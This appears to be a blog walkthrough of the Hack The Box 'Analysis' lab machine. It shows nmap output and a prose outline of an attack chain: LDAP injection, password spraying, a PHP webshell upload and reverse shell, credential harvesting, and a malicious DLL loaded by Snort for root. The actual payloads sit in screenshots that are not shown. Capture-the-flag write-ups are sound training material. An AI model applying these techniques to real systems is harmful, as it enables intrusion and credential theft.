In this post, I would like to share a walkthrough of the Analysis Machine from Hack the Box
This room will be considered a Hard machine on Hack the Box
What will you gain from the Analysis machine?
For the user flag, you must exploit a PHP website that utilizes LDAP to query user information from an Active Directory. Initially, I will employ LDAP injection techniques to enumerate user accounts. Subsequently, I will leverage this injection to access a shared account’s description field containing a password. This password will grant access to the admin panel. Within the admin panel, I will exploit an upload feature in two ways: uploading a webshell and executing an HTA file. Further, I will discover credentials for the next user in the autologon registry values and web server logs.
As for the root flag, you need to exploit the Snort dynamic preprocessor feature by crafting a malicious DLL and placing it in a location where Snort will load it.
Information Gathering on Analysis Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $nmap -sC -sV 10.10.11.250 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-01 07:23 EDT
Nmap scan report for 10.10.11.250
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-01 11:23:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-01T11:24:07
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.49 seconds
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $
Let’s access the website interface
There is nothing that I can abuse on the website interface.
Sadly, there is nothing that we can be looking into in the directory
Therefore, let’s enumerate the subdomain on the machine
On the subdomain on the internal, it shows us some error of “403: Forbidden, Access is denied”
We have successfully sighted the PHP file
There is an error saying “missing parameter”
After analyzing the parameter, I managed to find the potential username as a technician
Another potential username that we can use for further progress
We have successfully seen the response as shown above
We have found the login page when accessing the login.php on the employees
Spraying the username and password for the Analysis machine
The screenshot above shows the list of usernames that we can use for our next step
It will take a few minutes depending on the connection of the machine
At last, we managed to obtain the valid login credentials
We are presented with the dashboard as shown above
We can use a simple PHP reverse shell command shown in the screenshot above.
As a result, let’s upload the file on the website function as upload.php
It looks like a successful based on the error
Let’s test our command injection which looks like a success
We should be able to retrieve the reverse shell connection based on inputting the reverse shell command
However, the language of the machine seems something different from the English
After a while, I managed to find the PHP file that we managed to find earlier.
The source code of the list.php looks as shown in the screenshot above.
We also need to look into the employees’ directory
We managed to find a credential which it looks like a MySQL Database
As a result, let’s obtain another shell by using the command above.
Finally, we obtained a new reverse shell connection back to us.
Let’s upload PrivecsCheck.ps1 which can be found here
Therefore, let’s execute the command above
After a while, we managed to get jdoe’s credentials
It looks like the credentials can be used on evil-winrm
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges Access
I noticed a suspicious snort directory and hardly any snort has been installed on the victim’s machine.
Two directories have been stored within the snort directory
At least, we can upload any malicious file into the directory
Let’s start our listener on the attacker’s machine
As a result, let’s create a malicious file that saved as dll file format
Therefore, we should be able to upload the file into the victim’s machine
It will take a while for the reverse shell connection to be executed on our attacker’s machine
Boom! At last, we managed to retrieve the root shell
We can read the root flag by typing the “type root.txt” command
Another way to access the root shell on the machine
